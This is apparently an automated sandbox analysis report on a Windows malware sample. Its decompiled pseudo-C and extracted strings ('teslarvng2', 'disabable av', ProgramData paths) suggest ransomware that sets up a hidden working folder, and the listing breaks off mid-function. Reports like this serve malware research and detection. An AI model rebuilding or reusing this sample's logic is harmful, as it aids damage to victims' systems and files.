                                                                    0x00e6c858
                                                                    0x00e6c85c
                                                                    0x00e6c863
                                                                    0x00e6c869
                                                                    0x00e6c877
                                                                    0x00e6c885
                                                                    0x00e6c88b
                                                                    0x00e6c892
                                                                    0x00e6c898
                                                                    0x00e6c8a5
                                                                    0x00e6c8ad
                                                                    0x00e6c8b1
                                                                    0x00e6c8b5
                                                                    0x00e6c8b7
                                                                    0x00e6c8b7
                                                                    0x00e6c8bc
                                                                    0x00e6c8c2
                                                                    0x00e6c8c9
                                                                    0x00e6c8ce
                                                                    0x00e6c8db
                                                                    0x00e6c8e3
                                                                    0x00e6c8e7
                                                                    0x00e6c8eb
                                                                    0x00e6c8ed
                                                                    0x00e6c8ed
                                                                    0x00e6c8f2
                                                                    0x00e6c8f8
                                                                    0x00e6c8ff
                                                                    0x00e6c904
                                                                    0x00e6c911
                                                                    0x00e6c919
                                                                    0x00e6c91d
                                                                    0x00e6c921
                                                                    0x00e6c923
                                                                    0x00e6c923
                                                                    0x00e6c928
                                                                    0x00e6c92e
                                                                    0x00e6c935
                                                                    0x00e6c935
                                                                    0x00e6c93a
                                                                    0x00e6c941
                                                                    0x00e6c946
                                                                    0x00e6c950
                                                                    0x00e6c958
                                                                    0x00e6c965
                                                                    0x00e6c972
                                                                    0x00000000
                                                                    0x00e6c972
                                                                    0x00e6c266
                                                                    0x00e6c26b
                                                                    0x00e6c26e
                                                                    0x00e6c278
                                                                    0x00e6c27e
                                                                    0x00e6c285
                                                                    0x00e6c289
                                                                    0x00e6c28f
                                                                    0x00e6c292
                                                                    0x00e6c294
                                                                    0x00e6c297
                                                                    0x00e6c299
                                                                    0x00e6c29e
                                                                    0x00e6c29e
                                                                    0x00e6c2a0
                                                                    0x00e6c2a3
                                                                    0x00e6c2a3
                                                                    0x00e6c2a6
                                                                    0x00e6c2a9
                                                                    0x00e6c2ab
                                                                    0x00e6c2ad
                                                                    0x00e6c2b4
                                                                    0x00e6c2b7
                                                                    0x00e6c2bd
                                                                    0x00e6c2c2
                                                                    0x00e6c2c2
                                                                    0x00e6c2ad
                                                                    0x00e6c2c5
                                                                    0x00e6c2cc
                                                                    0x00e6c2dc
                                                                    0x00e6c2e2
                                                                    0x00e6c2e7
                                                                    0x00e6c2ea
                                                                    0x00e6c2f1
                                                                    0x00e6c2f3
                                                                    0x00e6c2fe
                                                                    0x00e6c303
                                                                    0x00e6c308
                                                                    0x00e6c308
                                                                    0x00e6c30f
                                                                    0x00e6c314
                                                                    0x00e6c31b
                                                                    0x00e6c31c
                                                                    0x00e6c321
                                                                    0x00e6c324
                                                                    0x00e6c327
                                                                    0x00e6c330
                                                                    0x00e6c330
                                                                    0x00e6c333
                                                                    0x00e6c336
                                                                    0x00e6c336
                                                                    0x00e6c336
                                                                    0x00e6c33e
                                                                    0x00e6c340
                                                                    0x00e6c341
                                                                    0x00e6c346
                                                                    0x00e6c34b
                                                                    0x00e6c34e
                                                                    0x00e6c353
                                                                    0x00e6c353
                                                                    0x00e6c362
                                                                    0x00e6c368
                                                                    0x00e6c36f
                                                                    0x00e6c371
                                                                    0x00e6c376
                                                                    0x00e6c37b
                                                                    0x00e6c380
                                                                    0x00e6c399
                                                                    0x00e6c3a4
                                                                    0x00e6c3a6
                                                                    0x00e6c3ac
                                                                    0x00e6c3b1
                                                                    0x00e6c3b4
                                                                    0x00e6c3b4
                                                                    0x00e6c3c0
                                                                    0x00e6c3c5
                                                                    0x00e6c3c8
                                                                    0x00e6c3ca
                                                                    0x00e6c3d0
                                                                    0x00e6c3d7
                                                                    0x00e6c3da
                                                                    0x00e6c3e2
                                                                    0x00e6c3ea
                                                                    0x00e6c3f2
                                                                    0x00e6c3fa
                                                                    0x00e6c401
                                                                    0x00e6c406
                                                                    0x00e6c410
                                                                    0x00e6c417
                                                                    0x00e6c41b
                                                                    0x00e6c422
                                                                    0x00e6c424
                                                                    0x00e6c424
                                                                    0x00e6c424
                                                                    0x00e6c430
                                                                    0x00e6c438
                                                                    0x00e6c445
                                                                    0x00e6c45f
                                                                    0x00e6c469
                                                                    0x00e6c46e
                                                                    0x00e6c477
                                                                    0x00000000
                                                                    0x00e6c477
                                                                    0x00000000
                                                                    0x00e6c3ca
                                                                    0x00e6bfff
                                                                    0x00e6bfff
                                                                    0x00e6c00a
                                                                    0x00e6c012
                                                                    0x00e6c015
                                                                    0x00e6c01a
                                                                    0x00e6c020
                                                                    0x00e6c020
                                                                    0x00e6c023
                                                                    0x00e6c026
                                                                    0x00e6c026
                                                                    0x00e6c035
                                                                    0x00e6c038
                                                                    0x00e6c041
                                                                    0x00e6c043
                                                                    0x00e6c043
                                                                    0x00e6c046
                                                                    0x00e6c049
                                                                    0x00e6c049
                                                                    0x00e6c043
                                                                    0x00e6c05b
                                                                    0x00e6c061
                                                                    0x00e6c06a
                                                                    0x00e6c070
                                                                    0x00e6c070
                                                                    0x00e6c073
                                                                    0x00e6c076
                                                                    0x00e6c076
                                                                    0x00e6c070
                                                                    0x00e6c07c
                                                                    0x00e6c084
                                                                    0x00e6c08e
                                                                    0x00e6c093
                                                                    0x00e6c09d
                                                                    0x00e6c0a2
                                                                    0x00e6c0ac
                                                                    0x00e6c0b1
                                                                    0x00e6c0be
                                                                    0x00e6c0c6
                                                                    0x00e6c0e0
                                                                    0x00e6c0e0
                                                                    0x00000000

                                                                    APIs
                                                                      • Part of subcall function 00E82E90: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00E8303C
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E6C00A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Ios_base_dtorMtx_unlockstd::ios_base::_
                                                                    • String ID: :A3Y$R5,$\ProgramData\Adobe$\ProgramData\Adobe\Extension Manager CC$\ProgramData\Adobe\Extension Manager CC\Logs\$\\?\c:$\programdata\dat$\st.xpi$goodjob$rngerror ,disabable av
                                                                    • API String ID: 3706157187-2175784347
                                                                    • Opcode ID: 20c8af4651f93dd953d678ade5b84a4d5f6d26163eef53e4d03ceca47a203a01
                                                                    • Instruction ID: ca75432516e9cd8dee62200b0354f899a6eae8ead05219260544c3cf29888997
                                                                    • Opcode Fuzzy Hash: 20c8af4651f93dd953d678ade5b84a4d5f6d26163eef53e4d03ceca47a203a01
                                                                    • Instruction Fuzzy Hash: 15D28CB0D00258DEEB20DF64DC55BEEB7B4AF15304F1052D9E549BB292EB706A88CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 75%
                                                                    			E00E69D10(void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi, long _a20) {
                                                                    				char _v8;
                                                                    				char _v16;
                                                                    				intOrPtr _v20;
                                                                    				char _v24;
                                                                    				intOrPtr _v28;
                                                                    				signed int _v32;
                                                                    				char _v34;
                                                                    				long _v36;
                                                                    				struct _OVERLAPPED* _v40;
                                                                    				struct _OVERLAPPED* _v44;
                                                                    				char _v60;
                                                                    				signed int _v80;
                                                                    				void* _v84;
                                                                    				signed int _v100;
                                                                    				struct _OVERLAPPED* _v104;
                                                                    				struct _OVERLAPPED* _v108;
                                                                    				char _v124;
                                                                    				signed int _v128;
                                                                    				long _v132;
                                                                    				char _v146;
                                                                    				char _v148;
                                                                    				long _v152;
                                                                    				intOrPtr _v156;
                                                                    				intOrPtr _v168;
                                                                    				intOrPtr _v172;
                                                                    				char _v188;
                                                                    				signed int _v192;
                                                                    				signed int _v196;
                                                                    				signed int _v200;
                                                                    				signed char _v201;
                                                                    				void* _v208;
                                                                    				signed int _v212;
                                                                    				void* _v216;
                                                                    				signed int _v220;
                                                                    				signed int _v224;
                                                                    				signed int _v232;
                                                                    				signed int _v236;
                                                                    				struct _OVERLAPPED* _v240;
                                                                    				struct _OVERLAPPED* _v244;
                                                                    				char _v260;
                                                                    				long _v264;
                                                                    				signed int _v268;
                                                                    				intOrPtr _v272;
                                                                    				struct _OVERLAPPED* _v276;
                                                                    				struct _OVERLAPPED* _v280;
                                                                    				char _v296;
                                                                    				struct _OVERLAPPED* _v300;
                                                                    				struct _OVERLAPPED* _v304;
                                                                    				char _v320;
                                                                    				struct _OVERLAPPED* _v324;
                                                                    				struct _OVERLAPPED* _v328;
                                                                    				char _v344;
                                                                    				struct _OVERLAPPED* _v348;
                                                                    				struct _OVERLAPPED* _v352;
                                                                    				char _v368;
                                                                    				struct _OVERLAPPED* _v372;
                                                                    				struct _OVERLAPPED* _v376;
                                                                    				char _v392;
                                                                    				struct _OVERLAPPED* _v400;
                                                                    				struct _OVERLAPPED* _v404;
                                                                    				void* _v416;
                                                                    				char _v420;
                                                                    				struct _OVERLAPPED* _v424;
                                                                    				struct _OVERLAPPED* _v428;
                                                                    				char _v440;
                                                                    				char _v444;
                                                                    				struct _OVERLAPPED* _v452;
                                                                    				char _v460;
                                                                    				signed int _v464;
                                                                    				void* __ebp;
                                                                    				signed int _t596;
                                                                    				signed int _t597;
                                                                    				char _t600;
                                                                    				signed int _t609;
                                                                    				signed int _t610;
                                                                    				unsigned int* _t621;
                                                                    				void* _t627;
                                                                    				intOrPtr* _t629;
                                                                    				WCHAR* _t630;
                                                                    				WCHAR* _t633;
                                                                    				void _t636;
                                                                    				signed int _t638;
                                                                    				void* _t643;
                                                                    				signed int _t646;
                                                                    				signed int _t648;
                                                                    				void* _t652;
                                                                    				intOrPtr _t655;
                                                                    				void* _t657;
                                                                    				char* _t658;
                                                                    				void* _t669;
                                                                    				intOrPtr* _t676;
                                                                    				signed int _t677;
                                                                    				intOrPtr* _t682;
                                                                    				short* _t688;
                                                                    				short* _t689;
                                                                    				void* _t694;
                                                                    				signed int _t704;
                                                                    				signed int _t705;
                                                                    				intOrPtr* _t707;
                                                                    				signed int _t708;
                                                                    				short* _t718;
                                                                    				short* _t719;
                                                                    				short* _t731;
                                                                    				short* _t732;
                                                                    				short* _t744;
                                                                    				short* _t745;
                                                                    				signed int _t754;
                                                                    				signed int _t755;
                                                                    				void* _t760;
                                                                    				signed int _t761;
                                                                    				signed int _t763;
                                                                    				signed int _t765;
                                                                    				signed int _t767;
                                                                    				signed int _t770;
                                                                    				unsigned int _t771;
                                                                    				char* _t783;
                                                                    				short* _t785;
                                                                    				char* _t793;
                                                                    				signed int _t797;
                                                                    				signed int* _t798;
                                                                    				void* _t803;
                                                                    				short* _t804;
                                                                    				intOrPtr* _t810;
                                                                    				signed int _t811;
                                                                    				short* _t821;
                                                                    				short* _t822;
                                                                    				short* _t823;
                                                                    				signed int _t832;
                                                                    				signed int _t833;
                                                                    				void* _t836;
                                                                    				unsigned int _t844;
                                                                    				char* _t847;
                                                                    				signed int _t849;
                                                                    				struct _OVERLAPPED* _t854;
                                                                    				signed int* _t858;
                                                                    				intOrPtr _t863;
                                                                    				intOrPtr _t866;
                                                                    				signed int _t882;
                                                                    				signed int _t883;
                                                                    				signed int _t903;
                                                                    				signed int _t904;
                                                                    				signed int _t945;
                                                                    				signed int _t952;
                                                                    				signed int _t969;
                                                                    				signed int _t970;
                                                                    				signed int _t989;
                                                                    				intOrPtr _t997;
                                                                    				signed int _t1014;
                                                                    				signed int _t1016;
                                                                    				signed int _t1018;
                                                                    				void* _t1022;
                                                                    				signed int _t1026;
                                                                    				signed int _t1027;
                                                                    				signed int _t1031;
                                                                    				signed int _t1034;
                                                                    				signed int _t1035;
                                                                    				signed int _t1037;
                                                                    				signed int _t1043;
                                                                    				void* _t1044;
                                                                    				signed int _t1046;
                                                                    				signed int _t1047;
                                                                    				signed int _t1051;
                                                                    				signed int _t1055;
                                                                    				signed int _t1056;
                                                                    				signed int _t1057;
                                                                    				signed int _t1059;
                                                                    				signed int _t1063;
                                                                    				signed int _t1064;
                                                                    				signed int _t1065;
                                                                    				signed int _t1070;
                                                                    				signed int _t1071;
                                                                    				signed int _t1072;
                                                                    				signed int _t1078;
                                                                    				signed int _t1079;
                                                                    				signed int _t1080;
                                                                    				short* _t1084;
                                                                    				short* _t1085;
                                                                    				signed int _t1089;
                                                                    				signed int _t1090;
                                                                    				signed int _t1091;
                                                                    				signed int _t1093;
                                                                    				signed int _t1098;
                                                                    				signed int _t1099;
                                                                    				signed int _t1100;
                                                                    				signed int _t1101;
                                                                    				signed int _t1102;
                                                                    				signed int _t1105;
                                                                    				signed int _t1106;
                                                                    				void* _t1109;
                                                                    				signed int _t1112;
                                                                    				signed int _t1114;
                                                                    				signed int _t1117;
                                                                    				void* _t1118;
                                                                    				signed int _t1119;
                                                                    				signed int _t1120;
                                                                    				void* _t1134;
                                                                    
                                                                    				_t987 = __edx;
                                                                    				_t838 = __ecx;
                                                                    				_push(__ebx);
                                                                    				_t836 = _t1109;
                                                                    				_t1112 = (_t1109 - 0x00000008 & 0xfffffff8) + 4;
                                                                    				_v8 =  *((intOrPtr*)(_t836 + 4));
                                                                    				_t1105 = _t1112;
                                                                    				_push(0xffffffff);
                                                                    				_push(0xec7b78);
                                                                    				_push( *[fs:0x0]);
                                                                    				_push(_t836);
                                                                    				_t596 =  *0xeef074; // 0xa6abe2d4
                                                                    				_t597 = _t596 ^ _t1105;
                                                                    				_v32 = _t597;
                                                                    				_push(__esi);
                                                                    				_push(__edi);
                                                                    				_push(_t597);
                                                                    				 *[fs:0x0] =  &_v24;
                                                                    				_v201 = __edx;
                                                                    				_t1021 = __ecx;
                                                                    				_v268 = __ecx;
                                                                    				_t1043 = 0;
                                                                    				_v200 = 0;
                                                                    				_v208 =  *((intOrPtr*)(_t836 + 8));
                                                                    				_v272 = 0xf2c23c;
                                                                    				_t600 = E00EA5E4B(0xf2c23c);
                                                                    				_t1114 = _t1112 - 0x1a0 + 4;
                                                                    				if(_t600 != 0) {
                                                                    					_push(_t600);
                                                                    					E00EA5F4D(_t836, _t838, __edx, _t1021, 0);
                                                                    					goto L93;
                                                                    				} else {
                                                                    					_v16 = _t600;
                                                                    					_v128 = _t600;
                                                                    					_v128 = 0xf;
                                                                    					_v132 = _t600;
                                                                    					_v132 = _t600;
                                                                    					_v148 = _t600;
                                                                    					_v132 = 2;
                                                                    					_v148 = _t600;
                                                                    					_v146 = _t600;
                                                                    					_v16 = 1;
                                                                    					_t844 =  *0xf2c094 & 0x0000ffff;
                                                                    					if(_v201 == 0x73) {
                                                                    						_t844 =  *0xf2c090 & 0x0000ffff;
                                                                    					}
                                                                    					_t621 =  &_v148;
                                                                    					 *_t621 = _t844;
                                                                    					_t622 =  >=  ? _v148 : _t621;
                                                                    					 *((char*)(( >=  ? _v148 : _t621) + 1)) = _t844 >> 8;
                                                                    					_push(_v132);
                                                                    					_t624 =  >=  ? _v148 :  &_v148;
                                                                    					E00E82E90(_t836, _t1021, _t1021,  >=  ? _v148 :  &_v148);
                                                                    					_t1117 = _t1114 - 0x18;
                                                                    					_t847 = _t1117;
                                                                    					_v232 = _t1117;
                                                                    					_push(4);
                                                                    					 *(_t847 + 0x10) = 0;
                                                                    					 *(_t847 + 0x14) = 0xf;
                                                                    					 *_t847 = 0;
                                                                    					L00E83CB0(_t836, _t847, "kbyc");
                                                                    					_v16 = 2;
                                                                    					_v16 = 1;
                                                                    					_t989 = _v201;
                                                                    					_t627 = E00E6DE30(_t836, _t1021, _t989, _t1021, _t1043);
                                                                    					_t1114 = _t1117 + 0x18;
                                                                    					if(_t627 == 0) {
                                                                    						_v108 = 0;
                                                                    						_v104 = 0;
                                                                    						_v108 = 0;
                                                                    						_v104 = 7;
                                                                    						_v124 = 0;
                                                                    						_v16 = 0xa;
                                                                    						_t629 = _v208;
                                                                    						_t849 =  *(_t629 + 0x10);
                                                                    						__eflags = _t849;
                                                                    						if(_t849 != 0) {
                                                                    							__eflags =  &_v124 - _t629;
                                                                    							if( &_v124 != _t629) {
                                                                    								__eflags =  *((intOrPtr*)(_t629 + 0x14)) - 8;
                                                                    								if( *((intOrPtr*)(_t629 + 0x14)) >= 8) {
                                                                    									_t629 =  *_t629;
                                                                    								}
                                                                    								_push(_t849);
                                                                    								_t944 =  &_v124;
                                                                    								goto L40;
                                                                    							}
                                                                    						} else {
                                                                    							asm("xorps xmm0, xmm0");
                                                                    							asm("movlpd [ebp-0xb8], xmm0");
                                                                    							 *0xf2c0b0( &_v196, 8);
                                                                    							_t760 = E00EC4970(_v196, _v192, 0x4876e7ff, 0x17);
                                                                    							_t945 = _t989;
                                                                    							_t1031 = _t760 + 0x3e8;
                                                                    							__eflags = _t1031;
                                                                    							_v212 = _t1031;
                                                                    							asm("adc ecx, 0x0");
                                                                    							_v196 = _t1031;
                                                                    							_v192 = _t945;
                                                                    							_v16 = 0xc;
                                                                    							_v216 =  &_v34;
                                                                    							if(_t1031 != 0) {
                                                                    								L26:
                                                                    								_t761 = _t1031;
                                                                    								_v224 = _t945;
                                                                    								_v236 = _t761 * 0x6d694b2f;
                                                                    								_t763 = _t1031;
                                                                    								_v264 = _t763 * 0x12e0be82 >> 0x20;
                                                                    								_t765 = _t945;
                                                                    								_v152 = _t765 * 0x6d694b2f >> 0x20;
                                                                    								_t767 = _v224;
                                                                    								_v232 = _t767 * 0x12e0be82 >> 0x20;
                                                                    								asm("adc edx, 0x0");
                                                                    								_v220 = _t767 * 0x12e0be82;
                                                                    								asm("adc ecx, 0x0");
                                                                    								_v156 = _t763 * 0x12e0be82 + _t765 * 0x6d694b2f + (_t761 * 0x6d694b2f >> 0x20);
                                                                    								_t1034 = _v212;
                                                                    								asm("adc eax, eax");
                                                                    								asm("adc esi, eax");
                                                                    								_t770 = _v224;
                                                                    								asm("sbb eax, esi");
                                                                    								_t771 = _t770 >> 1;
                                                                    								asm("adc eax, esi");
                                                                    								_t1084 = _v216;
                                                                    								_t1014 = (_t771 << 0x00000020 | ((_t770 << 0x00000020 | _t1034 - _v220 + _v152 + _v264) >> 0x1) + _v220 + _v152 + _v264) >> 0x1d;
                                                                    								_v224 = _t771 >> 0x1d;
                                                                    								_t1035 = _t1034 - _t1014 * 0x3b9aca00;
                                                                    								__eflags = _t1035;
                                                                    								_t952 = _t1035;
                                                                    								_v212 = _t1014;
                                                                    								_t1037 = 9;
                                                                    								do {
                                                                    									_t1084 = _t1084 - 2;
                                                                    									_t1016 = 0xcccccccd * _t952 >> 0x20 >> 3;
                                                                    									 *_t1084 = _t952 - _t1016 + _t1016 * 4 + _t1016 + _t1016 * 4 + 0x30;
                                                                    									_t952 = _t1016;
                                                                    									_t1037 = _t1037 - 1;
                                                                    									__eflags = _t1037;
                                                                    								} while (_t1037 != 0);
                                                                    								goto L28;
                                                                    							} else {
                                                                    								__eflags = _t1031 - 0xffffffff;
                                                                    								if(_t1031 > 0xffffffff) {
                                                                    									goto L26;
                                                                    									do {
                                                                    										do {
                                                                    											goto L26;
                                                                    											L28:
                                                                    											_t945 = _v224;
                                                                    											_t1031 = _v212;
                                                                    											_v216 = _t1084;
                                                                    											__eflags = _t945;
                                                                    										} while (__eflags > 0);
                                                                    										if(__eflags < 0) {
                                                                    											goto L31;
                                                                    										} else {
                                                                    											goto L30;
                                                                    										}
                                                                    										do {
                                                                    											goto L31;
                                                                    										} while (_t1031 != 0);
                                                                    										_v328 = _t1018;
                                                                    										_v344 = 0;
                                                                    										_t783 =  &_v34;
                                                                    										_v324 = _t1018;
                                                                    										_v328 = _t1018;
                                                                    										_v324 = 7;
                                                                    										__eflags = _t1084 - _t783;
                                                                    										if(_t1084 != _t783) {
                                                                    											__eflags = _t783 - _t1084;
                                                                    											E00E59930(_t836,  &_v344, _t1031, _t1084, _t1084, _t783 - _t1084 >> 1);
                                                                    										}
                                                                    										_v200 = 0x40;
                                                                    										_v200 = 0x40;
                                                                    										_v200 = 0x40;
                                                                    										_v16 = 0xb;
                                                                    										_t1021 = 0x20;
                                                                    										_v200 = 0x40;
                                                                    										_t785 = E00E73F90(_t836,  &_v296, "\\",  &_v344);
                                                                    										_t1114 = _t1114 + 4;
                                                                    										_t1085 = _t785;
                                                                    										_v16 = 0xe;
                                                                    										E00E72D00(_t836, _t1085, _v201 & 0x0000ffff);
                                                                    										asm("movups xmm0, [esi]");
                                                                    										_v244 = 0;
                                                                    										_v240 = 0;
                                                                    										asm("movups [ebp-0xf8], xmm0");
                                                                    										asm("movups [ebp-0x98], xmm0");
                                                                    										asm("movq xmm0, [esi+0x10]");
                                                                    										asm("movq [ebp-0xe8], xmm0");
                                                                    										 *(_t1085 + 0x10) = 0;
                                                                    										 *(_t1085 + 0x14) = 7;
                                                                    										 *_t1085 = 0;
                                                                    										asm("movq [ebp-0xe0], xmm0");
                                                                    										_v200 = 0x40;
                                                                    										L00E59AF0(_t836,  &_v124, 0x20);
                                                                    										asm("movups xmm0, [ebp-0x98]");
                                                                    										_v244 = 0;
                                                                    										_v240 = 7;
                                                                    										asm("movups [ebp-0x70], xmm0");
                                                                    										_v260 = 0;
                                                                    										asm("movq xmm0, [ebp-0xe0]");
                                                                    										asm("movq [ebp-0x60], xmm0");
                                                                    										_v200 = 0x40;
                                                                    										_v16 = 0xd;
                                                                    										L00E59AF0(_t836,  &_v260, 0x20);
                                                                    										_v16 = 0xb;
                                                                    										L00E59AF0(_t836,  &_v296, 0x20);
                                                                    										_t1043 = 0x40;
                                                                    										_v200 = 0x40;
                                                                    										_v16 = 0xa;
                                                                    										L00E59AF0(_t836,  &_v344, 0x20);
                                                                    										_t944 = _v208;
                                                                    										_t793 =  &_v124;
                                                                    										__eflags = _v208 - _t793;
                                                                    										if(_v208 != _t793) {
                                                                    											__eflags = _v104 - 8;
                                                                    											_push(_v108);
                                                                    											_t629 =  >=  ? _v124 : _t793;
                                                                    											L40:
                                                                    											_push(_t629);
                                                                    											E00E59930(_t836, _t944, _t1021, _t1043);
                                                                    										}
                                                                    										goto L41;
                                                                    										L30:
                                                                    										__eflags = _t1031 - 0xffffffff;
                                                                    									} while (_t1031 > 0xffffffff);
                                                                    								}
                                                                    							}
                                                                    							L31:
                                                                    							_t1084 = _t1084 - 2;
                                                                    							_t1018 = 0xcccccccd * _t1031 >> 0x20 >> 3;
                                                                    							 *_t1084 = _t1031 - _t1018 + _t1018 * 4 + _t1018 + _t1018 * 4 + 0x30;
                                                                    							_t1031 = _t1018;
                                                                    							__eflags = _t1031;
                                                                    						}
                                                                    						L41:
                                                                    						_push(L"\\programdata\\dat");
                                                                    						_t630 = E00E73CB0(_t836,  &_v296, L"\\\\?\\c:", _t1021);
                                                                    						_t1118 = _t1114 + 4;
                                                                    						_v16 = 0xf;
                                                                    						__eflags = _t630[0xa] - 8;
                                                                    						if(_t630[0xa] >= 8) {
                                                                    							_t630 =  *_t630;
                                                                    						}
                                                                    						DeleteFileW(_t630);
                                                                    						_v16 = 0xa;
                                                                    						L00E59AF0(_t836,  &_v296, _t1021);
                                                                    						_push(L"\\programdata\\dat");
                                                                    						_t633 = E00E73CB0(_t836,  &_v296, L"\\\\?\\c:", _t1021);
                                                                    						_t1114 = _t1118 + 4;
                                                                    						_v16 = 0x10;
                                                                    						__eflags = _t633[0xa] - 8;
                                                                    						if(_t633[0xa] >= 8) {
                                                                    							_t633 =  *_t633;
                                                                    						}
                                                                    						CreateDirectoryW(_t633, 0);
                                                                    						_v16 = 0xa;
                                                                    						L00E59AF0(_t836,  &_v296, _t1021);
                                                                    						_t1021 =  *0xf2c174; // 0x80deb0
                                                                    						_t987 = 0x7fffffff;
                                                                    						_v212 = _t1021;
                                                                    						_t636 =  *_t1021;
                                                                    						_v208 = _t636;
                                                                    						__eflags = _t636 - _t1021;
                                                                    						if(_t636 == _t1021) {
                                                                    							L61:
                                                                    							_t1021 =  *_t1021;
                                                                    							__eflags = _t1021 - _v212;
                                                                    							if(_t1021 == _v212) {
                                                                    								L81:
                                                                    								_t1021 = _v268;
                                                                    								_t854 =  *(_t1021 + 0x10);
                                                                    								_v232 = _t1021 + 0x10;
                                                                    								_t638 = _t1021;
                                                                    								__eflags =  *((intOrPtr*)(_t1021 + 0x14)) - 0x10;
                                                                    								if( *((intOrPtr*)(_t1021 + 0x14)) >= 0x10) {
                                                                    									_t638 =  *_t1021;
                                                                    								}
                                                                    								_push(_t854);
                                                                    								_push(_t638);
                                                                    								_v16 = 0x20;
                                                                    								_t838 =  *0xf29228; // 0x6
                                                                    								__eflags = 0x7ffffffe - _t838 - 0x10;
                                                                    								if(0x7ffffffe - _t838 < 0x10) {
                                                                    									goto L96;
                                                                    								} else {
                                                                    									__eflags =  *0xf2922c - 8;
                                                                    									_t642 =  >=  ? L"\\\\?\\c:" : L"\\\\?\\c:";
                                                                    									_t643 = E00E77D30( &_v296, _t987, _v272, _t838,  >=  ? L"\\\\?\\c:" : L"\\\\?\\c:", _t838, L"\\programdata\\dat", 0x10);
                                                                    									_t1119 = _t1114 - 0x18;
                                                                    									_t1046 = _t1043 | 0x00020000;
                                                                    									_v200 = _t1046;
                                                                    									_v220 = _t1119;
                                                                    									E00E743F0(_t1119, _t643,  &_v124);
                                                                    									_t1114 = _t1119 + 4;
                                                                    									_v16 = 0x21;
                                                                    									_v16 = 0x20;
                                                                    									L99();
                                                                    									_t1043 = _t1046 & 0xfffdffff;
                                                                    									_v200 = _t1043;
                                                                    									_v16 = 0xa;
                                                                    									L00E59AF0(_t836,  &_v296, _t1021);
                                                                    									_t858 = _v232;
                                                                    									_t646 = _t1021;
                                                                    									_t989 =  *_t858 - 1;
                                                                    									__eflags =  *((intOrPtr*)(_t1021 + 0x14)) - 0x10;
                                                                    									if( *((intOrPtr*)(_t1021 + 0x14)) >= 0x10) {
                                                                    										_t646 =  *_t1021;
                                                                    									}
                                                                    									 *_t858 = _t989;
                                                                    									 *((char*)(_t989 + _t646)) = 0;
                                                                    									_t648 =  *_t858 - 1;
                                                                    									__eflags =  *((intOrPtr*)(_t1021 + 0x14)) - 0x10;
                                                                    									if( *((intOrPtr*)(_t1021 + 0x14)) >= 0x10) {
                                                                    										_t1021 =  *_t1021;
                                                                    									}
                                                                    									 *_t858 = _t648;
                                                                    									 *((char*)(_t648 + _t1021)) = 0;
                                                                    									_v16 = 1;
                                                                    									L00E59AF0(_t836,  &_v124, _t1021);
                                                                    									goto L89;
                                                                    								}
                                                                    							} else {
                                                                    								while(1) {
                                                                    									__eflags =  *((intOrPtr*)(_t1021 + 0x1c)) - 0x10;
                                                                    									_t676 = _t1021 + 8;
                                                                    									_t882 =  *(_t676 + 0x10);
                                                                    									_v216 = _t676;
                                                                    									_v84 = 0;
                                                                    									_v80 = 0;
                                                                    									_v208 = _t882;
                                                                    									if( *((intOrPtr*)(_t1021 + 0x1c)) >= 0x10) {
                                                                    										_v216 =  *_t676;
                                                                    									}
                                                                    									__eflags = _t882 - 0x10;
                                                                    									if(_t882 >= 0x10) {
                                                                    										goto L67;
                                                                    									}
                                                                    									asm("movups xmm0, [eax]");
                                                                    									_v84 = _t882;
                                                                    									_v80 = 0xf;
                                                                    									asm("movups [ebp-0x58], xmm0");
                                                                    									L75:
                                                                    									_v16 = 0x1b;
                                                                    									_t682 = _v268;
                                                                    									_v216 = _t682;
                                                                    									__eflags =  *((intOrPtr*)(_t682 + 0x14)) - 0x10;
                                                                    									_v264 =  *((intOrPtr*)(_t682 + 0x10));
                                                                    									if( *((intOrPtr*)(_t682 + 0x14)) >= 0x10) {
                                                                    										_v216 =  *_t682;
                                                                    									}
                                                                    									__eflags = _v80 - 0x10;
                                                                    									_t886 =  >=  ? _v100 :  &_v100;
                                                                    									_t1053 = _v84 + ( >=  ? _v100 :  &_v100);
                                                                    									_v244 = 0;
                                                                    									__eflags = _v80 - 0x10;
                                                                    									_v240 = 0;
                                                                    									_t888 =  >=  ? _v100 :  &_v100;
                                                                    									_v260 = 0;
                                                                    									_v220 =  >=  ? _v100 :  &_v100;
                                                                    									_v244 = 0;
                                                                    									_v240 = 7;
                                                                    									E00E798B0(_t836,  &_v260, _t1021, _v84 + ( >=  ? _v100 :  &_v100) - ( >=  ? _v100 :  &_v100));
                                                                    									_v232 = 0;
                                                                    									_push(_v232);
                                                                    									E00E7A150(_t836,  &_v260, _t1021, _v220, _v84 + ( >=  ? _v100 :  &_v100));
                                                                    									_v16 = 0x1d;
                                                                    									_t688 = E00E59260( &_v260, "\\");
                                                                    									_v44 = 0;
                                                                    									_t1055 = _v200 | 0x00004000;
                                                                    									_v40 = 0;
                                                                    									asm("movups xmm0, [eax]");
                                                                    									asm("movups [ebp-0x30], xmm0");
                                                                    									asm("movq xmm0, [eax+0x10]");
                                                                    									asm("movq [ebp-0x20], xmm0");
                                                                    									 *(_t688 + 0x10) = 0;
                                                                    									 *(_t688 + 0x14) = 7;
                                                                    									 *_t688 = 0;
                                                                    									_v200 = _t1055;
                                                                    									_v16 = 0x1e;
                                                                    									_t689 = E00E59260( &_v60, L"teslarvng2");
                                                                    									_v280 = 0;
                                                                    									_t987 =  &_v296;
                                                                    									_v276 = 0;
                                                                    									_t1056 = _t1055 | 0x00008000;
                                                                    									asm("movups xmm0, [eax]");
                                                                    									asm("movups [ebp-0x11c], xmm0");
                                                                    									asm("movq xmm0, [eax+0x10]");
                                                                    									asm("movq [ebp-0x10c], xmm0");
                                                                    									 *_t689 = 0;
                                                                    									 *(_t689 + 0x10) = 0;
